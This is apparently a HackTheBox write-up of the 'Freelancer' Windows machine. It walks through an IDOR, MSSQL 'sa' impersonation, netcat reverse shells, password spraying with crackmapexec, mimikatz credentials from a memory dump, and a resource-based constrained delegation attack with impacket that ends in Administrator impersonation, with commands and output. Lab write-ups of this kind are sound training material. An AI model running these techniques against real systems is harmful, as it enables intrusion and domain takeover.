Freelaner is a hard-difficulty windows machine on HackTheBox, dealing initially with exploiting an IDOR vulnerability to get admin access on the dashboard followed by abusing user impersonation on MSSQL server to gain command execution using xp_cmdshell. Later analyzing a windows datacenter memory dump with MemProcFS to gain another user credentials and abuse Resource Based Constrained Delegation.
PS C:\Users\0xkujen> nmap -A-Pn10.129.9.24 Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-2019:27 W. Central Africa Standard Time NSOCK ERROR [0.3230s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 2.10% done; ETC: 19:27 (0:00:00 remaining) Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 3.20% done; ETC: 19:27 (0:00:00 remaining) Nmap scan report for10.129.9.24 Host is up (0.11s latency). Not shown: 988 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http nginx 1.25.5 |_http-title: Did not follow redirect to http://freelancer.htb/ |_http-server-header: nginx/1.25.5 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-2023:30:45Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=9/20%OT=53%CT=1%CU=34240%PV=Y%DS=2%DC=T%G=Y%TM=66EDBEB OS:B%P=i686-pc-windows-windows)SEQ(SP=FE%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S% OS:TS=U)SEQ(SP=FE%GCD=1%ISR=107%TI=RD%CI=I%II=I%TS=U)OPS(O1=M54ENW8NNS%O2=M OS:54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(W1=FFFF% OS:W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54EN OS:W8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W= OS:0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T OS:4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+ OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y OS:%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G% OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1173.00 ms 10.10.16.1 267.00 ms 10.129.9.24
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in63.03 seconds
We can see that port 80 is redirecting us to http://freelancer.htb/, so let’s add that entry to our /etc/hosts file.
We can see that this is a casual web app with a login and registration feastures. We can register ourselves both as a Freelancer or Employer.
Employer Account Registration
At first, the app tells us our account won’t be active upon creation: Employer Registration
And yes, once we try to login we’ll not be able to authenticate: Employer Registration
Taking a look at the Forgot Password feature, I try to reset my password entering my details first (I thought of this after exhausting all other though and trials to access the dashboard): Employer Registration
Then we are asked to change our password: Employer Registration
After changing my password and trying to login again, I don’t get the authentication error and I’m in: Employer Registration
QR Code Manipulation
One feature that intrigued me was the QR-Coe one: QR Code
Scanning the provided QR, I get this URL: http://freelancer.htb/accounts/login/otp/MTAwMTA=/1d3b89a43cc2ba9d0fd838ad1ef4dcea/ One thing I suspected is that “MTAwMTA=” looked like some base64 encoded string, I decode it and it give me the number “10010” which looks like some user id. I honestly was so lazy to create another user and validate it to check if the user id theory was correct. So I just assumed it is haha.
Therefore I tried different user id to try and reach an admin id. Trying the base64 value for id “1” gives me an Internal Server Error 500, as where the base64 value for id “2” returns this message: QR Code
But I was doing it really slow, so let’s re-do it more quickly: Admin Access
(PS: the base64 value for the id “2” is Mgo= - it’s the only value that worked for me)
Seeing that we are on a windows box, I immediately thought of MSSQL as the database management service. One thing I can do is try and enable xp_cmdshell on mssql to execute commands:
MSSQL Abuse
But we can see it failed due to lack of permissions. I thne immediately thought of this HackTricks article where we’ll be trying to impersonate sysadmin user:
1 2 3 4 5 6 7 8 9 10
select user_name(); //to determine the user name toadd the role to which is Freelancer_webapp_user EXECUTEAS LOGIN ='sa' SELECT IS_SRVROLEMEMBER('sysadmin') EXECUTEAS LOGIN ='sa' EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin' SELECT IS_SRVROLEMEMBER('sysadmin')
PS C:\Users\0xkujen> nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.160.22] 55468 Windows PowerShell running as user sql_svc on DC Copyright (C) 2015 Microsoft Corporation. All rights reserved.
As usual, I’ll be looking for hidden database credentials. Looking at the MSSQL server configurations, I stumbled upon sql-Configuration.INI file with a password:
The password is: IL0v3ErenY3ager I’ll check the C:/users folder to get usernames for enumeration:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name --------------------------- d-----10/4/202410:57 PM Administrator d-----5/28/202410:23 AM lkazanof d-----5/28/202410:23 AM lorra199 d-----5/28/202410:22 AM mikasaAckerman d-----8/27/20231:16 AM MSSQLSERVER d-r---5/28/20242:13 PM Public d-----5/28/202410:22 AM sqlbackupoperator d-----5/28/202411:16 AM sql_svc
PS C:\users>
Running the usernames and password against crackmapexec I find a valid match for mikasaAckerman user:
1 2 3 4 5 6 7 8
┌──(kali㉿kali)-[~/hackthebox/freelancer] └─$ crackmapexec smb freelancer.htb -u users.txt -p IL0v3ErenY3ager --continue-on-success SMB 10.129.9.24 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False) SMB 10.129.9.24 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager SMB 10.129.9.24 445 DC [-] freelancer.htb\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE SMB 10.129.9.24 445 DC [-] freelancer.htb\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE SMB 10.129.9.24 445 DC [-] freelancer.htb\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE SMB 10.129.9.24 445 DC [-] freelancer.htb\:IL0v3ErenY3ager STATUS_LOGON_FAILURE
I can get a shell as this user using RunasCs to perform actions by impersonating him. Therefore gaining a shell:
[+] Running in session 0 with processfunctionCreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-3ea25$\Default [+] Async process'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4880 created in background. PS C:\users\sql_svc\downloads>
And we get our shell:
1 2 3 4 5 6 7 8 9 10 11
PS C:\Users\0xkujen> nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.160.22] 61400 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
On mikasaAckerman‘s desktop, we could also see two interesting files, one of which is mail.txt:
1 2 3 4 5 6 7 8
PS C:\users\mikasaackerman\desktop> cat mail.txt cat mail.txt Hello Mikasa, I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019. I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart. Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue. Best regards, PS C:\users\mikasaackerman\desktop>
Reading the mail file, we can conclude that the MEMORY.7z file is a Datacenter memory dump file. I will transfer the file over to my station and have a look at it. For this I will be using this script to make it a base64 file and then transfer it over to my machine:
As the MEMORY.7z file is a datacenter memory dump, at first I thought of using Volatility to analyze it (as I love that tool). But after some more research I stumbled onto MemProcFS tool which will allow me to view the dump on a virtual system. MemProcFS has many features and plugins, one of which is mimikatz which gave me the sam hive including lorra user’s password:
┌──(kali㉿kali)-[~/Downloads] └─$ bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -dc dc.freelancer.htb -ns 10.129.160.22 --zip INFO: Found AD domain: freelancer.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc.freelancer.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 8 computers INFO: Connecting to LDAP server: dc.freelancer.htb INFO: Found 30 users INFO: Found 58 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: SetupMachine.freelancer.htb INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: Datacenter-2019 INFO: Querying computer: DC.freelancer.htb WARNING: Could not resolve: Datacenter-2019: The DNS operation timed out after 3.1036694049835205 seconds INFO: Done in 00M 16S INFO: Compressing output into 20241005120853_bloodhound.zip
Now let’s also check if we could connect with lorra on the system:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~/Downloads] └─$ evil-winrm -i 10.129.160.22 -u lorra199 -p 'PWN3D#l0rr@Armessa199' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\lorra199\Documents> whoami freelancer\lorra199 *Evil-WinRM* PS C:\Users\lorra199\Documents>
Resource Based Constrained Delegation
Putting that into Bloodhound, we can see that “lorra” is a member of the AD Recycle Bin and has generic rights on the domain controller itself:
RBCD RBCD
Now I’m going to abuse RBCS (resource based constrained delegration) by adding a fake computer that I control to the domain. Then I can perform actions as the DC to request Kerberos tickets for my fake computer giving me the ability to impersonate other accounts, like Administrator:
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] ATTACKER$ can now impersonate users on DC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] ATTACKER$ (S-1-5-21-3542429192-2036945976-3483670807-12101)
I just did sync my clock to the DC to avoid any issues:
1 2 3 4 5
┌──(kali㉿kali)-[~/impacket/examples] └─$ sudo ntpdate -u 10.129.160.22 2024-10-05 12:22:39.952632 (-0400) +99.756066 +/- 0.022332 10.129.160.22 s1 no-leap CLOCK: time stepped by 99.756066
Then I get service ticket for the cifs service using the Kerberos. Using this ticket, I can impersonate a specific user (aka Administrator hehe):
1 2 3 4 5 6 7 8 9 10 11
┌──(kali㉿kali)-[~/impacket/examples] └─$ impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.129.160.22 'freelancer.htb/ATTACKER$:Kujen2024!' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@[email protected]
I can now do a secretsdump on the DC to obtain all users hashes, therefore rooting the machine:
